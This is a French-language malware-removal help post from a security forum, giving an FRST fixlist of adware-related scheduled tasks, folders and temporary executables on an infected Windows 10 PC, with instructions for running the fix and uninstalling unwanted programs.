2017-03-03 23:50 - 2017-03-03 23:50 - 00003234 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange v209 - 1
2017-03-03 23:50 - 2017-03-03 23:50 - 00003220 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange v2 - 3
2017-03-03 23:50 - 2017-03-03 23:50 - 00003220 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange v2 - 2
2017-03-03 23:50 - 2017-03-03 23:50 - 00003220 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange v2 - 1
2017-03-03 23:50 - 2017-03-03 23:50 - 00000000 ____D C:\WINDOWS\SysWOW64\sstmp
2017-03-03 23:50 - 2017-03-03 23:50 - 00000000 ____D C:\WINDOWS\system32\sstmp
2017-03-03 23:50 - 2017-03-03 23:50 - 00000000 ____D C:\Users\KLEBER\AppData\Roaming\HDWallPaper
2017-03-03 23:50 - 2017-03-03 23:50 - 00000000 ____D C:\Users\Default\AppData\Local\AdvinstAnalytics
2017-03-03 23:50 - 2017-03-03 23:50 - 00000000 ____D C:\Users\Default User\AppData\Local\AdvinstAnalytics
2017-03-03 23:50 - 2017-03-03 23:50 - 00000000 ____D C:\Program Files (x86)\Microleaves
2017-03-03 23:47 - 2017-03-04 01:13 - 00000000 ____D C:\Users\KLEBER\AppData\Local\AppTrailers
2017-03-03 23:34 - 2017-03-03 23:34 - 00000000 ____D C:\Program Files (x86)\Anizeentruicult
2017-03-03 23:33 - 2017-03-03 23:34 - 00000002 _____ C:\END
2017-03-03 23:33 - 2017-03-03 23:33 - 00002052 _____ C:\WINDOWS\System32\Tasks\GI9HIh2mhI
2017-03-03 23:07 - 2017-03-04 01:20 - 00000000 ____D C:\Users\KLEBER\AppData\Roaming\Mowercultckumition
2017-03-03 23:07 - 2017-03-04 00:17 - 00006176 _____ C:\WINDOWS\System32\Tasks\Reuhyreiluty Launcher
2017-03-03 23:07 - 2017-03-03 23:35 - 00000000 ____D C:\Users\KLEBER\AppData\Local\Aninukchtight
2017-03-03 23:07 - 2017-03-03 23:07 - 00004014 _____ C:\WINDOWS\System32\Tasks\Ckofodom
2017-03-03 23:07 - 2017-03-03 23:07 - 00000000 ____D C:\Program Files (x86)\Reuhyreiluty Launcher
2017-03-03 23:06 - 2017-03-04 01:17 - 00000000 ____D C:\WINDOWS\system32\SSL
2017-03-03 22:53 - 2017-03-03 22:54 - 01333471 _____ C:\Users\KLEBER\Downloads\odbg110.zip
2017-03-03 23:58 - 2017-03-03 23:58 - 0425674 _____ (WeMonetize                                                  ) C:\Users\KLEBER\AppData\Local\Temp\BU3X4D9.exe
2017-03-04 00:14 - 2017-03-04 00:14 - 0605184 _____ (SIR6VJPGK) C:\Users\KLEBER\AppData\Local\Temp\OFYVYVBF5LAD.exe
Hosts:
EmptyTemp:

Menu Fichier / Enregistrer-sous
Place toi sur le bureau.
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clic sur Enregistrer - cela va créer un fichier fixlist.txt sur le bureau.
Ferme toutes les applications, y compris ton navigateur
Double-clique sur FRST.exe
Sous Vista, Windows 7, 8,10, etc.... il faut lancer le fichier par clic-droit ➫ Exécuter en tant qu'administrateur
Sur le menu principal, clique une seule fois sur Corriger/Fix et patiente le temps de la correction

Un redémarrage peut être nécessaire (pas obligatoire).
L'outil va créer un rapport de correction Fixlog.txt. Poste ce rapport dans ta réponse avec ton commentaire si c'est mieux !
Désinstalle/supprime via programmes et fonctionnalités (exécuter➯appwiz.cpl) :

DailyPcClean Support (HKLM-x32\...\dpcc_en_059020225_is1) (Version: - Tuto4PC.Com) <==== ATTENTION

EasyPhotoEdit Internet Explorer Homepage and New Tab (HKU\S-1-5-21-4292462852-3603650165-3095289502-1002\...\EasyPhotoEditTooltab Uninstall Internet Explorer) (Version: - Mindspark Interactive Network) <==== ATTENTION

groover (HKLM-x32\...\{1A79424E-A61C-40A1-8730-900A4ADC2B3B}) (Version: 2.0.0.478 - groover) <==== ATTENTION

Search module (HKLM-x32\...\Search module) (Version: - Goobzo) <==== ATTENTION

Traffic Exchange (x32 Version: 2.1.0 - Microleaves) Hidden <==== ATTENTION

WinZip 21.0 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C2410D}) (Version: 21.0.12288 - WinZip Computing, S.L. )

Malekal.com forum

Windows 10 infecté, fenêtres et pages s'ouvrent

Windows 10 infecté, fenêtres et pages s'ouvrent

Re: Windows 10 infecté, fenêtres et pages s'ouvrent